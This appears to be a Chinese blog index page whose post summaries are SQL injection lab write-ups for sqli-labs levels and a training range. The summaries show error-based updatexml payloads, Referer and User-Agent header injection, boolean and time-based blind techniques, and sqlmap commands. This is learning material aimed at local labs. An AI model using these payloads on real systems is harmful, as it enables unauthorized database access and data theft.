摘要: 第二十三关 ......(其实发现好简单的一关) 就是过滤 #和-- http://127.0.0.1/sqli/Less-23/?id=1' and '1'='1 http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(s 阅读全文
posted @ 2020-04-22 13:25 llcnKill 阅读(323) 评论(0) 推荐(0) 编辑
摘要: 其实漏洞写得很明确了,Referer存在漏洞 Referer:1' and '1'='1--+ Referer:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 #数据库 Referer:1' and upd 阅读全文
posted @ 2020-04-22 09:51 llcnKill 阅读(300) 评论(0) 推荐(0) 编辑
摘要: User-Agent:' or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) , 1, 1) # #版本 User-Agent:' or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 阅读全文
posted @ 2020-04-21 16:54 llcnKill 阅读(484) 评论(0) 推荐(0) 编辑
摘要: uname=admin&passwd=admin' and 1=1#&submit=Submit uname=admin&passwd=admin' and 1=2#&submit=Submit 深刻感受到我没有学到SQL注入的精髓. uname=admin&passwd=admin' order 阅读全文
posted @ 2020-04-21 15:08 llcnKill 阅读(299) 评论(0) 推荐(0) 编辑
摘要: sqli-第15关-时间盲注 时间盲注都是用工具的。手工太难了 将请求复制黏贴到txt,文件中 sqlmap -r C:\Users\Administrator\Desktop\post.txt --dbs sqlmap -r C:\Users\Administrator\Desktop\post. 阅读全文
posted @ 2020-04-20 11:49 llcnKill 阅读(295) 评论(0) 推荐(0) 编辑
摘要: https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe 得到信息2条 Deprecated: mysql_connect(): The mysql extension is deprecated and 阅读全文
posted @ 2020-04-17 15:25 llcnKill 阅读(419) 评论(0) 推荐(0) 编辑
摘要: 十一关 http://127.0.0.1/sqli/Less-11/ 看到这个页面,添个admin,admin在说. 什么情况,竟然出现这个结果.那么在乱填一个. 明显不一样了.那么我还是抓包处理一下. 抓到包,我们可以尝试重发测试. 看到数据库报错,第一个时间想到这点有漏洞. uname=xxey 阅读全文
posted @ 2020-04-17 09:44 llcnKill 阅读(314) 评论(0) 推荐(0) 编辑
摘要: 时间盲注也叫延迟注入 延迟注入,是一种盲注的手法,提交队形时间敏感的函数SQL语句,通过执行时间的长短来判断是否执行成功。 延迟注入的函数 sleep() #时间函数 if(condition,true,false) #条件语句 ascii() #转换成accii码 substring("strin 阅读全文
posted @ 2020-04-16 10:59 llcnKill 阅读(790) 评论(0) 推荐(0) 编辑
摘要: 1、深入理解http请求 常用: GET GET方法请求一个指定资源的表示形式。使用GET的请求应该只被用于获取数据。 POST POST方法用于将实体提交到指定的资源,通常导致在服务器上的状态变化或副作用。 我没这么用过的不熟悉的: HEAD HEAD方法请求一个与GET请求的响应相同的响应,但没 阅读全文
posted @ 2020-04-15 22:39 llcnKill 阅读(165) 评论(0) 推荐(0) 编辑
摘要: 布尔盲注(基于sqli-labs第八关) 对于盲注只有2种感觉,好玩,好烦。 新技能好玩,一个一个猜好烦。不知道你们是否跟我一样。 手工注入,一个个猜解。大多数人都会觉得特别烦躁的东西。 注入还设有第一点,看注入点在哪里。 个人的查看注入点的方式'单引号,“双引号, http://localhost 阅读全文
posted @ 2020-04-14 16:01 llcnKill 阅读(1423) 评论(0) 推荐(0) 编辑